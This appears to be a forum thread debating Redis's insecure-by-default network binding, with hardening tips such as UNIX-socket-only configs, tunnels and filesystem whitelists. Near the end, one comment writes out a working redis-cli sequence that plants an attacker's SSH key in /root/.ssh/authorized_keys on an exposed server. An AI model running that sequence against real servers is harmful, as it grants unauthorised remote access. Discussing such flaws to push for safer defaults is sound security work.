It is NOT OK for networked server software in 2015 to be "totally insecure if exposed to the outside world" without having this warning in large letters stressed very visibly in documentation and in the software installation process!
As is, Redis should probably default to only using the UNIX socket (where filesystem permissions apply), with TCP-enabling configuration options having impossible-to-miss warnings in example configs and documentation.
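A redis.conf sketch of that safer default might look like this (these are real redis.conf directives; the socket path is illustrative):

```conf
# Disable TCP entirely; listen only on a UNIX domain socket
port 0
unixsocket /var/run/redis/redis.sock
# Restrict access via filesystem permissions (owner only)
unixsocketperm 700
```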
In the blog post there's this part, castigating inattentive users for falling prey to this fail-open nature of Redis:
"The problem is that, whatever we state in our security page, there are a lot of Redis instances exposed to the internet unintentionally. Not because the use case requires outside clients to access Redis, but because nobody bothered to protect a given Redis instance from outside accesses via fire walling"
Sounds like the author should really have another hard think about this stance.
I have been in this position myself and I agree with your stance. Networked software should be secure by default. The assumption should be "networked" == "exposed to the Internet". From my redis.conf:
"By default Redis listens for connections from all the network interfaces available on the server."
In my case the reason Redis ended up exposed to the Internet was that another dev "updated the configuration" to the default provided by the package. Okay, perhaps that was the wrong thing to do, but it simply shouldn't be that easy to expose a vulnerable service to the Internet! I understand that people should run firewalls too, but a belt-and-braces approach should really be taken here.
PS. While I'm moaning, Jenkins is another big offender in this respect. I can't be the only person to have tried side-step its own security by having it only bind to localhost and using SSH tunnelling only to find something which can execute arbitrary code is exposed to the public Internet when the configuration is switched back to its default. Yes, a firewall would fix it, but as far as I'm concerned, Jenkins shares some of the blame for being insecure by default in the absence of one.
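The localhost-plus-tunnel setup I mean is just standard OpenSSH port forwarding (the hostname here is hypothetical):

```shell
# Jenkins bound to 127.0.0.1:8080 on the server; reach it from a workstation via:
ssh -N -L 8080:127.0.0.1:8080 user@ci.example.com
# then browse http://localhost:8080 locally
```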
The way Redis is pre-configured out of the box has certainly been evaluated extensively by antirez and the rest of his team. There are surely factors behind the decision to bind to every interface that we as end users aren't aware of. Either way, it's up to the engineer or IT team to perform a little due diligence and be cognizant of what their software is binding to. If something networked is going to be deployed to production, spend five or ten minutes on an impact analysis beforehand. You don't even have to do anything rigorous: five minutes with out-of-the-box utilities, e.g. netstat -tlnp, grepping for whatever you added.
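That kind of check doesn't even need netstat; a few lines of Python (a sketch; 6379 is Redis' default port) will tell you whether anything answers on a given interface:

```python
import socket

def is_port_open(host, port, timeout=0.5):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

if __name__ == "__main__":
    # Also try your machine's public IP, not just loopback,
    # to see what the outside world sees.
    print("127.0.0.1:6379 open?", is_port_open("127.0.0.1", 6379))
```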
Back in the day, daemons (especially IRCds) would have a 'comment me out to enable' line arbitrarily inserted into the generated conf file which would prevent the daemon from starting up at all. You'd spend ten minutes reading through the config files rather than just presuming they were configured the way you wanted. The belt-and-braces approach should be that. Then careless users wouldn't be able to just 'gem install <foo>' or 'apt-get install <bar>' and complain so often that an engineer who has contributed so much to the community has to take time out of his day to justify himself. Remember, antirez operated the entire project by himself (support and all), as a father, for multiple years before he was finally able to work on it full time, and now he has to explain "hey guys, you're sort of responsible for the way you configure your daemons".
I wasn't attacking antirez. We wouldn't be having this conversation if we didn't agree Redis is essentially good work. I was attacking insecure-by-default. The point is that it's not unlikely that someone might accidentally revert to the default configuration even when due diligence was done in the first place.
Can you please go beyond vague references like "tons of things behind the scenes" and "certainly been evaluated"? What's the direct answer to the question: "Why can't it just listen on loopback by default?"
I'm not sure "stupid users" and "clever Antirez" gets us any further towards a proper answer here.
As I read it, Redis is an engineering product, not end-user software like an Android app.
Whoever decides to use it should do their homework and _understand_ what they are installing.
This does not mean Redis can't harden its defaults and documentation, but it is also not Redis' fault that people are too lazy to really understand what a software stack is doing.
FWIW: Appointment Reminder also does this. It's part of your healthy HIPAA-approved breakfast.
(One of the other things you should strongly consider, if you care about HIPAA compliance, is using either full-disk encryption or encrypting the directory where Redis' data file resides. We do this with eCryptfs. We also use eCryptfs for the Tarsnap cache directory, which holds recoverable cleartext. Tarsnap archives themselves are encrypted automatically without requiring further work.)
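For reference, an eCryptfs overlay mount of that sort looks like this (a sketch; the path is illustrative, and the mount helper prompts interactively for key and cipher options):

```shell
# Mount the Redis data directory over itself as an encrypted eCryptfs overlay
sudo mount -t ecryptfs /var/lib/redis /var/lib/redis
```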
There are also another dozen or so box-ticking requirements with regard to procedures and documentation, but those are the main rubber-hits-the-hard-disk things you have to do with respect to using Redis for PHI.
Oh sorry, what other things did you do to fulfill the PHI criteria? I've had PCI-DSS, SOX and federal security experience, but nothing in healthcare. As such, I was wondering what sort of security protocols were required, and how much of it (if any) is just hand-waving security theater?
Problem is that even exposing Redis via tunnel is not really safe, because you never know what the client could be up to. You probably need a supervisor between the tunnel and the client that will manually approve each request to see if it is appropriate and doesn't contain anything illegal or malicious. That supervisor of course has to be screened by trusted body of government officials.
You might want to look at using spiped for this. It's much simpler (aka. more secure) than any ssh implementation, and because it uses one TCP connection per TCP connection, it avoids reconnection and multiplexing issues.
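A minimal spiped setup for Redis might look like this (a sketch based on spiped's documented -e/-d/-s/-t/-k flags; addresses and ports are illustrative):

```shell
# Generate a shared secret and copy it to both hosts
dd if=/dev/urandom bs=32 count=1 of=keyfile

# Server: decrypt traffic arriving on 6380 and hand it to local Redis
spiped -d -s '[0.0.0.0]:6380' -t '[127.0.0.1]:6379' -k keyfile

# Client: encrypt local connections to 6379 and send them to the server
spiped -e -s '[127.0.0.1]:6379' -t '[198.51.100.7]:6380' -k keyfile
```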
Good point. Btw, the ease of tunneling via SSH was one of the reasons most users at the Redis developers London meeting advised against putting native SSL support inside Redis itself.
I was going to object with "port forwarding is TCP over TCP!" but it turns out, after a little research, that this is totally wrong, and it's actually faster this way than OpenVPN: http://blog.backslasher.net/ssh-openvpn-tunneling.html . I guess I ended up thinking this because that's how dynamic port forwarding works?
edit: Yeah, that article is not just misleading, it's constructed in a way that looks methodical enough to pass for rigorous, which is what makes it dangerous. Different tools for different purposes, and he didn't even bother going to the vendor's own wiki to check the documentation. Ugh.
Don't bother reading the rant below unless you want technical details, but that administrator misconfigured his VPN to the point where OpenVPN delivered roughly a quarter of the throughput it should have.
It's been ages since I played around with networking at a low level (we're talking my teenage years, when ARIN didn't charge for netblocks and a Cisco 7206VXR could hold the entire Internet BGP table), but I'll give it a go.
1) It's not a fair comparison to begin with, since OpenVPN is maintaining a lot more state: as configured, it's acting as a Layer 3 router, so there's bound to be more overhead than a single point-to-point SSH connection. He should be using bridged mode and switching at Layer 2 via a virtual switch instead.[1] He sort of acknowledged this by appealing to the OSI layers, but then didn't check whether there was a way to disable the full routing functionality and drop down to switching.
As he himself said, he's using this simply to tunnel peer-to-peer, so if he configured his subnet as a /30 on OpenVPN, defined static routes, and read this guide [2], he'd see that an MTU of ~6000 is recommended (jumbo frames indeed!). Starting from a config similar to his (using iperf), the OpenVPN folks went from ~125Mbps to ~500Mbps.
That was without kernel tuning, just parameter changing.
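For the curious, the relevant knobs are plain OpenVPN config options (the values are the ones that guide suggests for fast point-to-point links, not universal defaults):

```conf
# Larger tunnel MTU, with OpenVPN-level fragmentation and MSS clamping disabled
tun-mtu 6000
fragment 0
mssfix 0
```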
2) I haven't tested this, but if you read the comments within the thread (especially those made by kasperd), his networking device is misconfigured at the kernel level (for his purposes), leading to tons of fragmentation that can be rectified [see: the MTU/MSS discussion in the OP's "Read more comments"]. edit: Yep, I was right. Check cite [2].
I'm sure someone who's actually in networking can address this further but this is not only apples-to-oranges but rotten-apples*-to-oranges. (where rotten-apples == a very poorly configured set of OpenVPN instances).
That I never have to care about remembering admin user names and that the configuration is so utterly trivial is part of why I love Redis so much. I am lazy and forgetful and "database systems" tend to scare me by being so complicated. I never really know if my Postgres user accounts are set up the right way. On my first job, SQL Server privileges were a frequent annoyance when deploying, testing, etc, and I'm pretty sure the whole "security" thing there was a total illusion anyway.
Given the example of being able to write stuff to the SSH authorized_keys file, it would be prudent to simply chroot your Redis installation. It seems like an easy, if somewhat old-fashioned, solution to at least that part.
Generally speaking, I think way too many services assume that they're allowed to roam the filesystem freely, when chrooting should be the bare minimum one could expect.
Debian does this in the default installation. It uses capabilities, I believe, not chroot, but the result is that there is a whitelist of directories where Redis can write: just /etc/redis/... (so it can rewrite its config) and the dir where Redis persists its data.
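On a systemd-based install, that kind of write whitelist can be expressed directly in the unit file (a sketch using real systemd directives; the paths follow Debian's layout):

```conf
[Service]
# Mount most of the filesystem read-only for the daemon...
ProtectSystem=strict
ProtectHome=true
# ...except the places Redis legitimately writes
ReadWritePaths=/etc/redis /var/lib/redis /var/log/redis
```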
Just been hacked through this method and cannot believe that Redis can ship with such ridiculously insecure defaults, and that they don't even MENTION the security concerns in the quickstart guide, which is what the majority of people would use to get Redis installed and set up.
Like having port 6379 be open to anyone who happens to wander by? Your firewall was horribly configured and you got burned, take this as a learning opportunity to fix your mistakes.
Exactly, but one wrong doesn't excuse another. Just because I didn't have my firewall configured correctly doesn't mean software I use should a) have insecure defaults and b) not make a song and dance about them on the page designed to get you up and running with it.
# It is also possible to completely kill a command by renaming it into
# an empty string:
#
# rename-command CONFIG ""
I'm a big Redis fan, and have used most of its power, including the great HyperLogLog stuff, but I never really looked at the CONFIG command and would never have imagined it allows such things.
Except that if no config file is specified, Redis defaults to binding to all interfaces instead of just localhost? The docs even advertise:
> This is perfectly fine if you are starting Redis just to play a bit with it or for development, but for production environments you should use a configuration file.
Not to mention you can overwrite arbitrary files by setting dbfilename and the working directory. (Not sure why these are runtime-configurable options to start with?)
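Concretely, the overwrite described above is the well-known redis-cli trick against an exposed instance (a sketch; the address and key material are illustrative, and it works because sshd skips the unparseable RDB framing lines around the planted key):

```shell
redis-cli -h 203.0.113.5 CONFIG SET dir /root/.ssh
redis-cli -h 203.0.113.5 CONFIG SET dbfilename authorized_keys
redis-cli -h 203.0.113.5 SET crackit "$(printf '\n\nssh-rsa AAAA...example... attacker@host\n\n')"
redis-cli -h 203.0.113.5 SAVE
```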
Hmm, 9 hours ago and some script kiddie has already performed this on my local Vagrant box? Pretty funny. I was running it behind a VPN and I guess that's how it got exposed.